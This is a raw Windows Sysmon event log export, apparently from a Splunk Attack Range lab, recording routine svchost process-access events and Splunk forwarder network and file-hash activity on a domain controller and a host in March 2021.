21:51:16.755{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918530Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:16.755{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x8000000000000000638806Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:11.379{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57271-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638808Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:17.740{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89E402CB7F32A75FDB93E3CF024ED1D5,SHA256=4EB4E0CBA91F91A4A04F772AA11AB082E5788C7AB9FC78A21C89AE86D1C568CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918534Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:17.755{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918533Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:17.755{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918532Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:17.016{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F63F358BAC335D1D7A329BA1748DD3E4,SHA256=9548A2A3D5BC2852CF0C31325C9EAA7AEF1EB8077FDC07FF22406C6291770D84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638809Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:18.740{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AD8EB7EB13F3FCE8AC6F3CF8B64FBBB,SHA256=CEF94BD1807D5D611A9D71D0601D2B3A959C466651FE672CE50C082CE6601786,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918539Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:18.756{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918538Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:18.756{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918537Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:15.787{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1055-false10.0.1.12-8000- 23542300x80000000000000005918536Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:18.145{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=758CDE02E07577729857E47392DEA978,SHA256=2169F87E1FC595ED27094937E5F91CC24AE1EFB36E21C9A4A8CDA19FA618561A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918535Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:18.023{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D06270ACED0B5BADED89A3CFA6B0CC88,SHA256=70A7D07973FF47E1D739505E1D736E1ED24DF03F23CDC6412BE5687B3C391E0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638810Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:19.756{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2FB9CA25EDB1B8BCAEF61EEFD89EE88,SHA256=A5400134E710A603FEC4F2C2B4FBE11A58A88361930536085192AD4525D6932B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918581Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.756{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918580Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.756{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918579Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.485{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2B00-00000000AE01}2056C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918578Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.485{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2B00-00000000AE01}2056C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918577Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.485{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918576Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.485{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918575Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918574Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918573Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918572Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918571Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918570Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918569Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918568Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918567Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918566Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918565Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918564Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918563Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918562Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918561Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:19.484{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918560Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 